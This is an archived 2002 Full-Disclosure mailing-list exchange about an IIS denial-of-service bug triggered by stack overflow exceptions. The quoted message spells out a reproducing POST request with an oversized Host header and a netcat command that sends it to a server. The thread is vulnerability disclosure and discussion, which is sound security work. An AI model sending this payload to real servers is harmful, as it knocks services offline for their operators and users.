Heh. I thought my screenshot DID show exactly how to reproduce the bug: You run SPIKE! :> You can download SPIKE 2.7 at http://www.immunitysec.com/spike.html - it's the exact version I used in the demonstration screenshot. You should read my actual commentary on the bug. The bug is actually IIS servicing a stack overflow exception, and is not limited to /_vti_bin/shtml.dll or any other particular file or directory. It also affects IIS 5.1. It's not limited to the Host: field, as far as I can tell. Any "stack overflow" exception will trigger this behavior. Dave Aitel Immunity, Inc. On Fri, 2002-10-11 at 19:26, Joe Testa wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > > - From the screenshots and descriptions given in > <http://online.securityfocus.com/bid/5907>, it's not clear *exactly* how to > reproduce the IIS Host header DoS. > > A POST request like the following (between the [begin] and [end] lines) > will > manually reproduce the IIS DoS condition: > > > - -------------------------[begin]-------------------------------------- > POST /_vti_bin/shtml.dll HTTP/1.0 > Host: [32762 '/' characters] > Content-length: 22 > > > http://www.rapid7.com/ > - --------------------------[end]--------------------------------------- > > > This will cause the web service to consume 99% of the CPU for about 35 > seconds. During this time, no other HTTP requests will be serviced. > Attached > to this email is the complete string to facilitate testing. Use it with: > > $ nc x.x.x.x 80 < iis_dos > > > - Joe Testa, Rapid 7, Inc. > http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x02B00839 > A145 B158 2CA7 00A2 BAE8 4A18 57E5 18E0 02B0 0839 > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.7 (Cygwin32) > > iD8DBQE9p1w3V+UY4AKwCDkRAjHQAJ0Vx5c1rJvDY5+n2595Wq6NQbqwOACeNBBO > GcA6qrjAE1Tj+Jqx3kE9U4Q= > =RkVz > -----END PGP SIGNATURE----- > > (See attached file: iis_dos) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Sun Oct 13 2002 - 02:28:03 PDT